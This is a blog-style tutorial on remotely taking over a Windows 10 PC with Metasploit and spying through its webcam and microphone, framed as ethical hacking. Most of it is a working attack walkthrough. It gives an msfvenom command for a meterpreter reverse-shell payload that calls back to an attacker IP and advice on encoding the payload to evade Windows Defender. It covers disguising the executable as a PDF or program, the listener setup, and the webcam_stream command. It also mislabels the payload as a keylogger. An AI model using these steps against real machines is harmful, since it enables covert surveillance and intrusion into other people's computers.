How to Hack a Windows 10 User’s (Webcam, Microphone etc) & Exploit Them using Metasploit Remotely

Cover image: hacker image generated by AI in the dark (Wikimedia commons: Matankic)

Disclaimer: This article is for educational purposes and seeks to promote ethical hacking and superior cybersecurity practices in organizations and private entities. It does not advocate for any malicious intent. Furthermore, all materials used in this tutorial are solely personal and intentionally set vulnerable. I, therefore, absolve myself from any future unauthorized scripting from parties reading this article that may compromise the integrity of respective wireless networks

Do you ever fancy hacking someone’s webcam(ethically if you are here) or exploring what they are currently doing on their screens? Or getting hold of their microphones? Well, if they are using windows 10 you may be in for a bread-and-butter session. In this tutorial, we will be using reverse tcp and listening from port 4444 of a windows 10 machine. You can read about reversing tcp here. As usual, I will hack my Windows 10 Machine using my Laptop’s kali Linux

Requirements

• Kali Linux PC — Attacker
• Windows 10 — Target
• A USB — To deliver the backdoor keylogger.exe (Can be delivered wireless embedded in an adobe file)

Prerequisites

Install Metasploit Framework on your Linux machine. The basic code is

apt-get install. Also, you can watch this video in case you get lost. You need to open two terminals and su one to open the Metasploit exploit framework. (The two devices need to be connected to the same network):

1. The first step is to create a payload using msfvenom. We also need to encode it with encryption to bypass detection by Windows 10 defender. We can also manually allow the .exe file generated as a legitimate file in Defender. The code for generating a payload is below

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.0.104 -a x64 LPORT=4444 -f exe >window.exe

-p: The platform which is windows

windows/x64/meterpreter_reverse_tcp : The reverse tcp attack we are using. To learn more about which attacker to select in case your architecture is different, open the other tab and type: msfconsole to boot up the Metasploit framework; then type search type: exploit platform: windows

-a x64: Our Target Architecture machine is windows 10 of x64 type

LHOST: our IP Address (run ifconfig to determine the Linux IP address)

(Optional to add) -e x86/shikata_ga_nai: We can encode the window.exe file using this encryption to bypass windows 10 defender. In case Windows 10 detects this as a virus, obviously, it is but for the purpose of the demo, allow it onto the PC

LPORT: The Listening port which for this case is 4444

-f exe: We are creating a keylogger in form of a .exe file that the user needs to execute. We will save the file as spy.exe but attackers mostly embed the .exe in very fancy executable programs/pdf/malicious links onto which unsuspecting victims. You can read more here: which requires advanced mastery of scripting using evilpdf tool.

1. Transfer the window.exe file to the Target Windows 10 pc. We will be using a USB stick to do the transfer to keep the tutorial simple. As written above, you can learn about the advanced inscription of the .exe file onto other mild-looking extension files or programs.

1. Boot up the Metasploit Framework and begin setting the payload. Our keylogger is a meterpreter, a product tool used for penetration testing systems.

use exploit/multi/handler → We will be exploiting the system hence we are using the exploit tool located in the “multi/handler” folder

set payload windows/x64/meterpreter_reverse_tcp → we initially set a payload in step one using this attacker hence we need to respecify in the Metasploit framework

set LHOST 192.168.0.104 → We need to set our host again. Mostly after the preceding step, when we click show options, the LHOST portion is always empty

show options → To identify any missing portions. We can however note that our LHOST and LPORT are not empty(Required before exploitation)

1. Time to Exploit now to establish a Meterpreter connection. Go back to the Windows 10 PC and click the spy.exe file that we saved from the USB and observe the window after clicking run/exploit on the Kali Linux machine. The window should return “Meterpreter sessions started .” as quoted in the figure below. It is advisable to turn off your windows defender for the hacking session. I am devising ways of engulfing the.exe to appear legitimate and non-traceable

run

1. We now have control of the Windows 10 PC since our terminal has changed to meterpreter>. You can type help to view some commands and take note of the ones you want to exploit. You can also study how to capture the audio recording or observe a remote screen-sharing session. To finally hack the webcam of windows 10, just type

webcam_stream

Follow-up Notes:

• To avoid detections, we needed to encode our payload (window.exe) file to effectively bypass the Windows 10 Defender.

Recommendations

• Organisations should enact strong policies to advocate against sharing USB devices from external sources into the Architecture by embedding up-to-date Anti-virus systems that detect illegal keyloggers in Emails.
• Always keep an eye on the Task Manager to monitor any applications that seem off. Most of the keyloggers though are curated to mimic PC Apps that may seem legit.